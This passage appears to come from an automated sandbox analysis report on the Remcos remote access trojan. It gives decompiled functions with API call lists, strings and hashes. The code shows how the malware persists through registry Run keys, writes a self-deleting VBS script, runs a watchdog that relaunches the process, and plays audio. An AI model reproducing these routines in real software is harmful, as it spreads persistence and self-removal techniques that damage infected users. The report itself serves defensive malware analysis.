				}
				_t53 = E00402489();
				_t54 = E00401F95(0x46c560);
				_t57 = E00410A30(E00401F95(0x46c518), "exepath",  &_v692, 0x208, _t54, _t53);
				_t248 = _t57;
				if(_t57 == 0) {
					GetModuleFileNameW(0,  &_v692, 0x208);
				}
				RegDeleteKeyA(0x80000001, E00401F95(0x46c518));
				_t61 = SetFileAttributesW( &_v692, 0x80);
				_t140 = 0x46c530;
				asm("sbb bl, bl");
				_t134 =  ~_t61 & 0x00000001;
				_t62 = E004074E4(_t248);
				_t249 = _t62;
				if(_t62 != 0) {
					_t140 = 0x46c530;
					SetFileAttributesW(E00401EEB(0x46c530), 0x80);
				}
				E004030A6(_t134,  &_v124, E0040427F(_t134,  &_v52, E0043987F(_t134, _t140, _t249, L"Temp")), 0, _t249, L"\\update.vbs");
				E00401EF0();
				E00404405(_t134,  &_v28, L"On Error Resume Next\n", _t249, E0040427F(_t134,  &_v52, L"Set fso = CreateObject(\"Scripting.FileSystemObject\")\n"));
				E00401EF0();
				_t250 = _t134;
				if(_t134 != 0) {
					E00403311(E004030A6(_t134,  &_v52, E00404405(_t134,  &_v76, L"while fso.FileExists(\"", _t250, E0040427F(_t134,  &_v100,  &_v692)), 0, _t250, L"\")\n"));
					E00401EF0();
					E00401EF0();
					E00401EF0();
				}
				E00403311(E004030A6(_t134,  &_v100, E004030A6(_t134,  &_v76, E0040427F(_t134,  &_v52, L"fso.DeleteFile \""), 0, _t250,  &_v692), 0, _t250, L"\"\n"));
				E00401EF0();
				E00401EF0();
				E00401EF0();
				_t251 = _t134;
				if(_t134 != 0) {
					E0040766C(_t134,  &_v28, 0, L"wend\n");
				}
				_t78 = E004074E4(_t251);
				_t252 = _t78;
				if(_t78 != 0) {
					E00403311(E004030A6(0x45f724,  &_v100, E00409E69( &_v76, L"fso.DeleteFolder \"", _t252, 0x46c530), 0, _t252, L"\"\n"));
					E00401EF0();
					E00401EF0();
				}
				_t79 = E0040427F(0x45f724,  &_v172, L"\"\"\", 0");
				E00403311(E004030A6(0x45f724,  &_v100, E00403030( &_v76, E00404429(0x45f724,  &_v52, E0040427F(0x45f724,  &_v148, L"CreateObject(\"WScript.Shell\").Run \"cmd /c \"\""), _t252,  &_a4), _t79), 0, _t252, "\n"));
				E00401EF0();
				E00401EF0();
				E00401EF0();
				E00401EF0();
				E00401EF0();
				E0040766C(0x45f724,  &_v28, 0, L"fso.DeleteFile(Wscript.ScriptFullName)");
				_t92 = E00401EEB( &_v124);
				_t93 = E00402489();
				if(E00417947(E00401EEB( &_v28), _t93 + _t93, _t92, 0) != 0 && ShellExecuteW(0, L"open", E00401EEB( &_v124), 0x45f724, 0x45f724, 0) > 0x20) {
					ExitProcess(0);
				}
				E00401EF0();
				E00401EF0();
				return E00401EF0();
			}

0x0040b0ee
0x0040b0fa
0x0040b0fc
0x0040b0fc
0x0040b104
0x0040b10a
0x0040b10c
0x0040b10c
0x0040b118
0x0040b126
0x0040b126
0x0040b130
0x0040b135
0x0040b13b
0x0040b14c
0x0040b151
0x0040b152
0x0040b158
0x0040b169
0x0040b16e
0x0040b16f
0x0040b175
0x0040b189
0x0040b18e
0x0040b196
0x0040b19e
0x0040b1c4
0x0040b1ce
0x0040b1d0
0x0040b1db
0x0040b1db
0x0040b1ee
0x0040b206
0x0040b211
0x0040b216
0x0040b218
0x0040b21b
0x0040b220
0x0040b222
0x0040b229
0x0040b234
0x0040b234
0x0040b254
0x0040b25d
0x0040b278
0x0040b281
0x0040b286
0x0040b288
0x0040b2bc
0x0040b2c4
0x0040b2cc
0x0040b2d4
0x0040b2d4
0x0040b30c
0x0040b314
0x0040b31c
0x0040b324
0x0040b329
0x0040b32b
0x0040b335
0x0040b335
0x0040b348
0x0040b34d
0x0040b34f
0x0040b374
0x0040b37c
0x0040b384
0x0040b384
0x0040b399
0x0040b3d8
0x0040b3e0
0x0040b3e8
0x0040b3f0
0x0040b3fb
0x0040b406
0x0040b413
0x0040b41c
0x0040b425
0x0040b443
0x0040b463
0x0040b463
0x0040b46c
0x0040b474
0x0040b487

APIs

Part of subcall function 0041015B: TerminateProcess.KERNEL32(00000000,0046C500,0040D1DC), ref: 0041016B
Part of subcall function 0041015B: WaitForSingleObject.KERNEL32(000000FF), ref: 0041017E

GetModuleFileNameW.KERNEL32(00000000,?,00000208), ref: 0040B1DB
RegDeleteKeyA.ADVAPI32(80000001,00000000), ref: 0040B1EE
SetFileAttributesW.KERNEL32(?,00000080), ref: 0040B206
SetFileAttributesW.KERNEL32(00000000,00000080), ref: 0040B234

Part of subcall function 00409D73: TerminateThread.KERNEL32(0040884B,00000000,0046C500,0040ADA3,?,0046C518,0046C500), ref: 00409D82
Part of subcall function 00409D73: UnhookWindowsHookEx.USER32(00000000), ref: 00409D92
Part of subcall function 00409D73: TerminateThread.KERNEL32(00408830,00000000,?,0046C518,0046C500), ref: 00409DA4

Part of subcall function 00417947: CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000002,00000080,00000000,00000000,00000000,0045F724,00000000,00000000,?,0040B0BC,00000000,00000000), ref: 00417986

ShellExecuteW.SHELL32(00000000,open,00000000,0045F724,0045F724,00000000), ref: 0040B457
ExitProcess.KERNEL32 ref: 0040B463

Strings

open, xrefs: 0040B451
Set fso = CreateObject("Scripting.FileSystemObject"), xrefs: 0040B262
""", 0, xrefs: 0040B38E
\update.vbs, xrefs: 0040B236
Software\Microsoft\Windows\CurrentVersion\Run\, xrefs: 0040B130
Remcos, xrefs: 0040B12B
Temp, xrefs: 0040B23B
while fso.FileExists(", xrefs: 0040B29F
Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\, xrefs: 0040B17F
CreateObject("WScript.Shell").Run "cmd /c "", xrefs: 0040B3A3
fso.DeleteFile(Wscript.ScriptFullName), xrefs: 0040B40B
exepath, xrefs: 0040B1B6
"), xrefs: 0040B28A
On Error Resume Next, xrefs: 0040B270
fso.DeleteFolder ", xrefs: 0040B357
fso.DeleteFile ", xrefs: 0040B2E5
wend, xrefs: 0040B32D

Memory Dump Source

Source File: 00000007.00000002.923320301.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000002.923593535.000000000046F000.00000040.00000001.sdmp Download File

Yara matches

Similarity

API ID: File$Terminate$AttributesProcessThread$CreateDeleteExecuteExitHookModuleNameObjectShellSingleUnhookWaitWindows
String ID: """, 0$")$CreateObject("WScript.Shell").Run "cmd /c ""$On Error Resume Next$Remcos$Set fso = CreateObject("Scripting.FileSystemObject")$Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\$Software\Microsoft\Windows\CurrentVersion\Run\$Temp$\update.vbs$exepath$fso.DeleteFile "$fso.DeleteFile(Wscript.ScriptFullName)$fso.DeleteFolder "$open$wend$while fso.FileExists("
API String ID: 1861856835-219127200
Opcode ID: 496a2bf8be3f90726c3cb8c66032a1cfb772c35640ea603dec4012a77cc14e90
Instruction ID: 15120c8502facc1a94d34f6ce0dfcdb30145111763f7023834469a4ad8d2fcb5
Opcode Fuzzy Hash: 496a2bf8be3f90726c3cb8c66032a1cfb772c35640ea603dec4012a77cc14e90
Instruction Fuzzy Hash: 52915E31A101185ACB14FBA1DCA6AEF776AAF50744F10007FB806771E3EF785E4A869D

Uniqueness

Uniqueness Score: -1.00%

Function 0040FD95, Relevance: 40.4, APIs: 17, Strings: 6, Instructions: 181
synchronizationCOMMON

Download Yara Rule

C-Code - Quality: 94%

			E0040FD95() {
				long _v8;
				char _v32;
				short _v556;
				short _v1076;
				short _v1596;
				short _v2116;
				void* _t27;
				void* _t28;
				void* _t31;
				long _t37;
				int _t41;
				long _t50;
				void* _t55;
				void* _t68;
				void* _t70;
				int _t71;
				void* _t72;
				long _t73;
				void* _t110;
				void* _t112;
				void* _t115;
				void* _t116;

				_t71 = 0;
				_v8 = _t73;
				CreateMutexA(0, 1, "Mutex_RemWatchdog");
				GetModuleFileNameW(0,  &_v2116, 0x104);
				_t27 = E00402489();
				_t28 = E00401F95(0x46c560);
				_t108 = 0x46c518;
				_t31 = E00410A30(E00401F95(0x46c518), "exepath",  &_v556, 0x208, _t28, _t27);
				_t116 = _t115 + 0x14;
				if(_t31 != 0) {
					E004020D5(0,  &_v32);
					if(E004179DC( &_v556,  &_v32) == 0) {
						goto L1;
					}
					_t110 = OpenProcess(0x100000, 0, _v8);
					WaitForSingleObject(_t110, 0xffffffff);
					CloseHandle(_t110);
					_t37 = GetCurrentProcessId();
					if(E00410BB0(0x46c518, E00401F95(0x46c518), "WDH", _t37) == 0) {
						L18:
						_push(1);
						L2:
						ExitProcess();
					}
					_t108 = ShellExecuteW;
					do {
						_t41 = PathFileExistsW( &_v556);
						_t42 =  &_v556;
						if(_t41 != 0) {
							L11:
							ShellExecuteW(_t71, L"open", _t42, _t71, _t71, 1);
							L12:
							do {
								_t72 = E00410885(E00401F95(0x46c518), "WD",  &_v8);
								_t122 = _t72;
								if(_t72 == 0) {
									Sleep(0x1f4);
								} else {
									E00410CE2(E00401F95(0x46c518), _t122, "WD");
								}
							} while (_t72 == 0);
							goto L17;
						}
						_t55 = E00402489();
						if(E00417947(E00401F95( &_v32), _t55,  &_v556, _t71) == 0) {
							E00431F00(_t108,  &_v1596, _t71, 0x208);
							_t116 = _t116 + 0xc;
							GetTempPathW(0x104,  &_v1596);
							GetTempFileNameW( &_v1596, L"temp_", _t71,  &_v1076);
							lstrcatW( &_v1076, L".exe");
							_t68 = E00402489();
							_t70 = E00417947(E00401F95( &_v32), _t68,  &_v1076, _t71);
							__eflags = _t70;
							if(_t70 == 0) {
								goto L12;
							}
							_t42 =  &_v1076;
							goto L11;
						}
						_t42 =  &_v556;
						goto L11;
						L17:
						_t71 = 0;
						_t112 = OpenProcess(0x100000, 0, _v8);
						WaitForSingleObject(_t112, 0xffffffff);
						CloseHandle(_t112);
						_t50 = GetCurrentProcessId();
					} while (E00410BB0(0x46c518, E00401F95(0x46c518), "WDH", _t50) != 0);
					goto L18;
				}
				L1:
				_push(_t71);
				goto L2;
			}

0x0040fda8
0x0040fdaa
0x0040fdae
0x0040fdc1
0x0040fdce
0x0040fdd6
0x0040fde7
0x0040fdfb
0x0040fe00
0x0040fe05
0x0040fe11
0x0040fe26
0x00000000
0x00000000
0x0040fe37
0x0040fe3c
0x0040fe43
0x0040fe49
0x0040fe67
0x0040ffde
0x0040ffde
0x0040fe08
0x0040fe08
0x0040fe08
0x0040fe6d
0x0040fe73
0x0040fe7a
0x0040fe82
0x0040fe88
0x0040ff3e
0x0040ff49
0x0040ff4b
0x0040ff50
0x0040ff67
0x0040ff6b
0x0040ff6d
0x0040ff8a
0x0040ff6f
0x0040ff7d
0x0040ff82
0x0040ff90
0x00000000
0x0040ff50
0x0040fe93
0x0040feaf
0x0040fec9
0x0040fece
0x0040fedd
0x0040fef7
0x0040ff09
0x0040ff1a
0x0040ff2d
0x0040ff34
0x0040ff36
0x00000000
0x00000000
0x0040ff38
0x00000000
0x0040ff38
0x0040feb1
0x00000000
0x0040ff94
0x0040ff97
0x0040ffa5
0x0040ffaa
0x0040ffb1
0x0040ffb7
0x0040ffd6
0x00000000
0x0040fe73
0x0040fe07
0x0040fe07
0x00000000

APIs

CreateMutexA.KERNEL32(00000000,00000001,Mutex_RemWatchdog,0046C578,0046C518,00000000), ref: 0040FDAE
GetModuleFileNameW.KERNEL32(00000000,?,00000104), ref: 0040FDC1

Part of subcall function 00410A30: RegOpenKeyExA.KERNELBASE(80000001,00000000,00000000,00020019,00000000,0046C518), ref: 00410A4C
Part of subcall function 00410A30: RegQueryValueExA.KERNELBASE(00000000,00000000,00000000,00000000,00000208,?), ref: 00410A65
Part of subcall function 00410A30: RegCloseKey.KERNELBASE(00000000), ref: 00410A70

ExitProcess.KERNEL32 ref: 0040FE08
OpenProcess.KERNEL32(00100000,00000000,00000000), ref: 0040FE31
WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 0040FE3C
CloseHandle.KERNEL32(00000000), ref: 0040FE43
GetCurrentProcessId.KERNEL32 ref: 0040FE49
PathFileExistsW.SHLWAPI(?), ref: 0040FE7A
ShellExecuteW.SHELL32(00000000,open,?,00000000,00000000,00000001), ref: 0040FF49
OpenProcess.KERNEL32(00100000,00000000,00000000), ref: 0040FF9F
WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 0040FFAA
CloseHandle.KERNEL32(00000000), ref: 0040FFB1
GetCurrentProcessId.KERNEL32 ref: 0040FFB7

Strings

WDH, xrefs: 0040FE50, 0040FFBE
open, xrefs: 0040FF43
exepath, xrefs: 0040FDED
Mutex_RemWatchdog, xrefs: 0040FDA1
.exe, xrefs: 0040FEFD
temp_, xrefs: 0040FEEB

Memory Dump Source

Source File: 00000007.00000002.923320301.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000002.923593535.000000000046F000.00000040.00000001.sdmp Download File

Yara matches

Similarity

API ID: Process$CloseOpen$CurrentFileHandleObjectSingleWait$CreateExecuteExistsExitModuleMutexNamePathQueryShellValue
String ID: .exe$Mutex_RemWatchdog$WDH$exepath$open$temp_
API String ID: 2645874385-232273909
Opcode ID: a28846a215f10c602c3f8558ceab602c9d5a429de202bec3ef673ea7704a0fa4
Instruction ID: 936eab12b9defa7a847bf0088e47ae9fd65786244bd6017a6c84ea0ad7cef012
Opcode Fuzzy Hash: a28846a215f10c602c3f8558ceab602c9d5a429de202bec3ef673ea7704a0fa4
Instruction Fuzzy Hash: 7E51D671A003066FDB10ABA0DC49EFE336D9B0475AF10407BF505A72E2EF789E49865D

Uniqueness

Uniqueness Score: -1.00%

Function 004169CC, Relevance: 38.7, APIs: 12, Strings: 10, Instructions: 185
synchronizationCOMMON

Download Yara Rule

C-Code - Quality: 86%

			E004169CC(void* __ecx, void* __edx, char _a4) {
				char _v24;
				char _v28;
				char _v52;
				char _v76;
				char _v100;
				char _v124;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* _t25;
				void* _t28;
				void* _t43;
				void* _t60;
				void* _t63;
				void* _t67;
				CHAR* _t89;
				void* _t109;
				CHAR* _t110;
				void* _t111;
				void* _t114;
				void* _t118;

				_t103 = __edx;
				_t67 = __ecx;
				_t109 = __edx;
				if(E00416C12( &_a4, __ecx, __ecx) == 0xffffffff) {
					_t63 = E00401EEB( &_a4);
					_t103 = 0x30;
					E00401EFA( &_a4, 0x30, _t111, E0041805B( &_v28, 0x30, _t63));
					E00401EF0();
				}
				_t25 = E00402489();
				_t120 = _t25;
				if(_t25 == 0) {
					__eflags = PathFileExistsW(E00401EEB( &_a4));
					if(__eflags != 0) {
						goto L4;
					} else {
						E00402084(_t67, _t114 - 0x18, 0x45f6bc);
						_push(0xa8);
						E00404AA4(_t67, 0x46ca18, _t103, __eflags);
					}
				} else {
					_t60 = E00401EEB( &_a4);
					_t118 = _t114 - 0x18;
					E004020EC(_t67, _t118, _t103, _t120, _t109);
					E00417A4E(_t60);
					_t114 = _t118 + 0x18;
					L4:
					_t28 = E004172DA( &_v124, _t67);
					_t108 = E00403030( &_v28, E004030A6(_t67,  &_v76, E00409E69( &_v100, L"open \"", _t120,  &_a4), _t109, _t120, L"\" type "), _t28);
					E004030A6(_t67,  &_v52, _t32, _t109, _t120, L" alias audio");
					E00401EF0();
					E00401EF0();
					E00401EF0();
					E00401EF0();
					mciSendStringW(E00401EEB( &_v52), 0, 0, 0);
					mciSendStringA("play audio", 0, 0, 0);
					_t115 = _t114 - 0x18;
					E00402084(0, _t114 - 0x18, 0x45f6bc);
					_push(0xa9);
					E00404AA4(0, 0x46ca18, _t32, 0);
					_t43 = CreateEventA(0, 1, 0, 0);
					while(1) {
						L5:
						 *0x46bea8 = _t43;
						while(1) {
							_t122 = _t43;
							if(_t43 == 0) {
								break;
							}
							__eflags =  *0x46bea6; // 0x0
							if(__eflags != 0) {
								mciSendStringA("pause audio", 0, 0, 0);
								 *0x46bea6 = 0;
							}
							__eflags =  *0x46bea5; // 0x0
							if(__eflags != 0) {
								mciSendStringA("resume audio", 0, 0, 0);
								 *0x46bea5 = 0;
							}
							mciSendStringA("status audio mode",  &_v24, 0x14, 0);
							_t108 =  &_v24;
							_t110 = "stopped";
							_t89 = 0;
							while(1) {
								__eflags = ( *(_t108 + _t89) & 0x000000ff) -  *((intOrPtr*)(_t110 + _t89));
								if(( *(_t108 + _t89) & 0x000000ff) !=  *((intOrPtr*)(_t110 + _t89))) {
									break;
								}
								_t89 = _t89 + 1;
								__eflags = _t89 - 8;
								if(_t89 != 8) {
									continue;
								} else {
									SetEvent( *0x46bea8);
								}
								break;
							}
							__eflags = WaitForSingleObject( *0x46bea8, 0x1f4);
							if(__eflags != 0) {
								_t43 =  *0x46bea8; // 0x0
							} else {
								CloseHandle( *0x46bea8);
								_t43 = 0;
								goto L5;
							}
						}
						mciSendStringA("stop audio", 0, 0, 0);
						mciSendStringA("close audio", 0, 0, 0);
						E00402084(0, _t115 - 0x18, 0x45f6bc);
						_push(0xaa);
						E00404AA4(0, 0x46ca18, _t108, _t122);
						E00401EF0();
						goto L21;
					}
				}
				L21:
				return E00401EF0();
			}

0x004169cc
0x004169d6
0x004169d8
0x004169e6
0x004169eb
0x004169f1
0x00416a00
0x00416a08
0x00416a08
0x00416a0f
0x00416a17
0x00416a19
0x00416b06
0x00416b08
0x00000000
0x00416b0e
0x00416b18
0x00416b1d
0x00416b27
0x00416b27
0x00416a1f
0x00416a1f
0x00416a24
0x00416a2c
0x00416a33
0x00416a38
0x00416a3b
0x00416a45
0x00416a78
0x00416a7d
0x00416a86
0x00416a8e
0x00416a96
0x00416a9e
0x00416ab1
0x00416ac5
0x00416ac7
0x00416ad1
0x00416ad6
0x00416ae0
0x00416aea
0x00416af0
0x00416af0
0x00416af0
0x00416bc1
0x00416bc1
0x00416bc3
0x00000000
0x00000000
0x00416b31
0x00416b37
0x00416b41
0x00416b43
0x00416b43
0x00416b49
0x00416b4f
0x00416b59
0x00416b5b
0x00416b5b
0x00416b6d
0x00416b6f
0x00416b72
0x00416b77
0x00416b79
0x00416b7d
0x00416b80
0x00000000
0x00000000
0x00416b82
0x00416b83
0x00416b86
0x00000000
0x00416b88
0x00416b8e
0x00416b8e
0x00000000
0x00416b86
0x00416ba5
0x00416ba7
0x00416bbc
0x00416ba9
0x00416baf
0x00416bb5
0x00000000
0x00416bb5
0x00416ba7
0x00416bd1
0x00416bdb
0x00416be7
0x00416bec
0x00416bf6
0x00416bfe
0x00000000
0x00416bfe
0x00416af0
0x00416c03
0x00416c11

APIs

mciSendStringW.WINMM(00000000,00000000,00000000,00000000), ref: 00416AB1
mciSendStringA.WINMM(play audio,00000000,00000000,00000000), ref: 00416AC5
CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,000000A9,0045F6BC), ref: 00416AEA
PathFileExistsW.SHLWAPI(00000000,00000000,00000000,?,00000000,0046C238), ref: 00416B00
mciSendStringA.WINMM(pause audio,00000000,00000000,00000000), ref: 00416B41
mciSendStringA.WINMM(resume audio,00000000,00000000,00000000), ref: 00416B59
mciSendStringA.WINMM(status audio mode,?,00000014,00000000), ref: 00416B6D
SetEvent.KERNEL32 ref: 00416B8E
WaitForSingleObject.KERNEL32(000001F4), ref: 00416B9F
CloseHandle.KERNEL32 ref: 00416BAF
mciSendStringA.WINMM(stop audio,00000000,00000000,00000000), ref: 00416BD1
mciSendStringA.WINMM(close audio,00000000,00000000,00000000), ref: 00416BDB

Strings

resume audio, xrefs: 00416B54
close audio, xrefs: 00416BD6
alias audio, xrefs: 00416A3B
play audio, xrefs: 00416AC0
stop audio, xrefs: 00416BCC
" type , xrefs: 00416A53
status audio mode, xrefs: 00416B68
open ", xrefs: 00416A4E
pause audio, xrefs: 00416B3C
stopped, xrefs: 00416B72

Memory Dump Source

Source File: 00000007.00000002.923320301.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000002.923593535.000000000046F000.00000040.00000001.sdmp Download File

Yara matches

Similarity

API ID: SendString$Event$CloseCreateExistsFileHandleObjectPathSingleWait
String ID: alias audio$" type $close audio$open "$pause audio$play audio$resume audio$status audio mode$stop audio$stopped
API String ID: 738084811-1354618412
Opcode ID: 4155854fe69e9a894aa6cca67176808cb6c1e0df87573e648ce2644fb1009e8c
Instruction ID: 973dc57b0db8283a3ff3d0709b6d05c4eb7b4f2cac8df707c3dce394e9b06912
Opcode Fuzzy Hash: 4155854fe69e9a894aa6cca67176808cb6c1e0df87573e648ce2644fb1009e8c
Instruction Fuzzy Hash: 755180716001086FD704BBB5DC92DFF3A6DDA41389B10413FF902A61E2EF799D8586AE

Uniqueness

Uniqueness Score: -1.00%

Function 0040AD84, Relevance: 37.0, APIs: 6, Strings: 15, Instructions: 259
registryCOMMON

Download Yara Rule

C-Code - Quality: 98%

			E0040AD84() {
				char _v28;
				char _v52;
				char _v76;
				char _v100;
				char _v124;
				char _v148;
				short _v668;
				void* _t49;
				void* _t50;
				void* _t53;
				void* _t56;
				void* _t82;
				void* _t84;
				void* _t85;
				signed char _t123;
				signed char _t124;
				void* _t227;
				void* _t229;
				void* _t230;
				void* _t231;

				E0041015B();
				if( *0x46a9d4 != 0x30) {
					E00409D73();
				}
				_t227 =  *0x46bd6b - 1; // 0x0
				if(_t227 == 0) {
					E0041537E(_t227);
				}
				if( *0x46ba75 != 0) {
					E00417754(E00401EEB(0x46c0e0));
				}
				_t214 = L"Software\\Microsoft\\Windows\\CurrentVersion\\Run\\";
				_t229 =  *0x46bb02 - 1; // 0x1
				if(_t229 == 0) {
					E00410D5C(0x80000001, L"Software\\Microsoft\\Windows\\CurrentVersion\\Run\\", E00401EEB(0x46c4e8));
				}
				_t230 =  *0x46bafb - 1; // 0x0
				if(_t230 == 0) {
					E00410D5C(0x80000002, _t214, E00401EEB(0x46c4e8));
				}
				_t231 =  *0x46bb00 - 1; // 0x0
				if(_t231 == 0) {
					E00410D5C(0x80000002, L"Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer\\Run\\", E00401EEB(0x46c4e8));
				}
				E00431F00(0,  &_v668, 0, 0x208);
				_t49 = E00402489();
				_t50 = E00401F95(0x46c560);
				_t53 = E00410A30(E00401F95(0x46c518), "exepath",  &_v668, 0x208, _t50, _t49);
				_t232 = _t53;
				if(_t53 == 0) {
					GetModuleFileNameW(0,  &_v668, 0x208);
				}
				RegDeleteKeyA(0x80000001, E00401F95(0x46c518));
				_t56 = E004074E4(_t232);
				_t233 = _t56;
				if(_t56 != 0) {
					SetFileAttributesW(E00401EEB(0x46c530), 0x80);
				}
				_t123 =  ~(SetFileAttributesW( &_v668, 0x80));
				asm("sbb bl, bl");
				E004030A6(_t123,  &_v148, E004172DA( &_v76, E00417093( &_v28)), 0, _t233, L".vbs");
				E00401EF0();
				E00401FC7();
				E00404429(_t123,  &_v124, E004030A6(_t123,  &_v28, E0040427F(_t123,  &_v76, E0043987F(_t123,  &_v28, _t233, L"Temp")), 0, _t233, "\\"), _t233,  &_v148);
				E00401EF0();
				E00401EF0();
				E00404405(_t123,  &_v52, L"On Error Resume Next\n", _t233, E0040427F(_t123,  &_v28, L"Set fso = CreateObject(\"Scripting.FileSystemObject\")\n"));
				E00401EF0();
				_t124 = _t123 & 0x00000001;
				_t234 = _t124;
				if(_t124 != 0) {
					E00403311(E004030A6(_t124,  &_v28, E00404405(_t124,  &_v76, L"while fso.FileExists(\"", _t234, E0040427F(_t124,  &_v100,  &_v668)), 0, _t234, L"\")\n"));
					E00401EF0();
					E00401EF0();
					E00401EF0();
				}
				E00403311(E004030A6(_t124,  &_v100, E004030A6(_t124,  &_v28, E0040427F(_t124,  &_v76, L"fso.DeleteFile \""), 0, _t234,  &_v668), 0, _t234, L"\"\n"));
				E00401EF0();
				E00401EF0();
				E00401EF0();
				_t235 = _t124;
				if(_t124 != 0) {
					E0040766C(_t124,  &_v52, 0, L"wend\n");
				}
				_t82 = E004074E4(_t235);
				_t236 = _t82;
				if(_t82 != 0) {
					E00403311(E004030A6(0x45f724,  &_v100, E00409E69( &_v28, L"fso.DeleteFolder \"", _t236, 0x46c530), 0, _t236, L"\"\n"));
					E00401EF0();
					E00401EF0();
				}
				E0040766C(0x45f724,  &_v52, 0, L"fso.DeleteFile(Wscript.ScriptFullName)");
				_t84 = E00401EEB( &_v124);
				_t85 = E00402489();
				if(E00417947(E00401EEB( &_v52), _t85 + _t85, _t84, 0) != 0) {
					ShellExecuteW(0, L"open", E00401EEB( &_v124), 0x45f724, 0x45f724, 0);
				}
				ExitProcess(0);
			}

0x0040ad90
0x0040ad9c
0x0040ad9e
0x0040ad9e
0x0040ada6
0x0040adac
0x0040adae
0x0040adae
0x0040adba
0x0040adc8
0x0040adc8
0x0040add2
0x0040add7
0x0040addd
0x0040adee
0x0040adf3
0x0040adf4
0x0040adfa
0x0040ae0b
0x0040ae10
0x0040ae11
0x0040ae17
0x0040ae2b
0x0040ae30
0x0040ae41
0x0040ae50
0x0040ae58
0x0040ae79
0x0040ae81
0x0040ae83
0x0040ae8e
0x0040ae8e
0x0040aea1
0x0040aeb3
0x0040aebe
0x0040aec0
0x0040aecf
0x0040aecf
0x0040aee4
0x0040aeeb
0x0040af04
0x0040af0d
0x0040af15
0x0040af4a
0x0040af53
0x0040af5b
0x0040af76
0x0040af7f
0x0040af84
0x0040af84
0x0040af87
0x0040afbb
0x0040afc3
0x0040afcb
0x0040afd3
0x0040afd3
0x0040b00b
0x0040b013
0x0040b01b
0x0040b023
0x0040b028
0x0040b02a
0x0040b034
0x0040b034
0x0040b047
0x0040b04c
0x0040b04e
0x0040b073
0x0040b07b
0x0040b083
0x0040b083
0x0040b090
0x0040b099
0x0040b0a2
0x0040b0c0
0x0040b0d4
0x0040b0d4
0x0040b0db

APIs

Part of subcall function 0041015B: TerminateProcess.KERNEL32(00000000,0046C500,0040D1DC), ref: 0041016B
Part of subcall function 0041015B: WaitForSingleObject.KERNEL32(000000FF), ref: 0041017E

GetModuleFileNameW.KERNEL32(00000000,?,00000208,?,?,?,?,?,?,0046C518,0046C500), ref: 0040AE8E
RegDeleteKeyA.ADVAPI32(80000001,00000000), ref: 0040AEA1
SetFileAttributesW.KERNEL32(00000000,00000080,?,?,?,?,?,?,0046C518,0046C500), ref: 0040AECF
SetFileAttributesW.KERNEL32(?,00000080,?,?,?,?,?,?,0046C518,0046C500), ref: 0040AEDD

Part of subcall function 00409D73: TerminateThread.KERNEL32(0040884B,00000000,0046C500,0040ADA3,?,0046C518,0046C500), ref: 00409D82
Part of subcall function 00409D73: UnhookWindowsHookEx.USER32(00000000), ref: 00409D92
Part of subcall function 00409D73: TerminateThread.KERNEL32(00408830,00000000,?,0046C518,0046C500), ref: 00409DA4

ShellExecuteW.SHELL32(00000000,open,00000000,0045F724,0045F724,00000000), ref: 0040B0D4
ExitProcess.KERNEL32 ref: 0040B0DB

Strings

open, xrefs: 0040B0CE
Set fso = CreateObject("Scripting.FileSystemObject"), xrefs: 0040AF60
Software\Microsoft\Windows\CurrentVersion\Run\, xrefs: 0040ADD2
Remcos, xrefs: 0040ADCD
Temp, xrefs: 0040AF26
while fso.FileExists(", xrefs: 0040AF9E
Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\, xrefs: 0040AE21
.vbs, xrefs: 0040AEE6
fso.DeleteFile(Wscript.ScriptFullName), xrefs: 0040B088
exepath, xrefs: 0040AE6B
"), xrefs: 0040AF89
On Error Resume Next, xrefs: 0040AF6E
fso.DeleteFolder ", xrefs: 0040B056
fso.DeleteFile ", xrefs: 0040AFE4
wend, xrefs: 0040B02C

Memory Dump Source

Source File: 00000007.00000002.923320301.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000002.923593535.000000000046F000.00000040.00000001.sdmp Download File

Yara matches

Similarity

API ID: FileTerminate$AttributesProcessThread$DeleteExecuteExitHookModuleNameObjectShellSingleUnhookWaitWindows
String ID: ")$.vbs$On Error Resume Next$Remcos$Set fso = CreateObject("Scripting.FileSystemObject")$Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\$Software\Microsoft\Windows\CurrentVersion\Run\$Temp$exepath$fso.DeleteFile "$fso.DeleteFile(Wscript.ScriptFullName)$fso.DeleteFolder "$open$wend$while fso.FileExists("
API String ID: 3659626935-3677834288
Opcode ID: 792134fd87e98148c8d854e5586bd324178bcfd0ed59dee402beeba099fd1f71
Instruction ID: 1589e96350d2b26083133e670dfbb90ce18de44782133b39b347ac2ed663d9b9
Opcode Fuzzy Hash: 792134fd87e98148c8d854e5586bd324178bcfd0ed59dee402beeba099fd1f71
Instruction Fuzzy Hash: D1816D71A102145ACB15FBA1DCA69EF776A9F50704F10003FB806771E2EE7C5E8A869D

Uniqueness

Uniqueness Score: -1.00%

Function 00401A64, Relevance: 35.2, APIs: 16, Strings: 4, Instructions: 155
fileCOMMON

Download Yara Rule

C-Code - Quality: 95%

			E00401A64(WCHAR* __ecx, signed int __edx) {
				long _v8;
				void _v12;
				void _v16;
				void _v20;
				void _v24;
				void _v28;
				void _v32;
				signed int _t36;
				void** _t75;
				signed int _t80;
				void* _t81;
				signed int _t83;

				_t75 = __edx;
				_t80 =  *0x46ba9a & 0x0000ffff;
				_t83 = ( *0x46baa6 & 0x0000ffff) * _t80;
				_v20 = 1;
				_v16 = 0x10;
				_v24 = _t83 *  *0x46ba9c >> 3;
				asm("cdq");
				_v28 = _t83 + (__edx & 0x00000007) >> 3;
				_t36 =  *(__edx + 4) * _t80;
				_v32 = _t36;
				_v12 = _t36 + 0x24;
				_t81 = CreateFileW(__ecx, 0x40000000, 0, 0, 2, 0x80, 0);
				if(_t81 != 0xffffffff) {
					WriteFile(_t81, "RIFF", 4,  &_v8, 0);
